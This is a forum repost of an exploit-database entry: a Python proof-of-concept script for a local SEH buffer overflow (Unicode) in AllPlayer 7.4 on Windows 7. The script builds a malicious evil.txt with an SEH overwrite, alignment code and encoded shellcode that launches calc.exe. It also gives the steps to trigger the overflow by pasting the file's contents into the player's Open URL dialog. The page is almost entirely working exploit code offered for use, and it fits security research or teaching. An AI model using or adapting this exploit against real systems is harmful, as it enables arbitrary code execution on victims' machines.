AllPlayer 7.4 - SEH Buffer Overflow (Unicode) - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月8日2年前

#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

AllPlayer 7.4 - SEH Buffer Overflow (Unicode)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索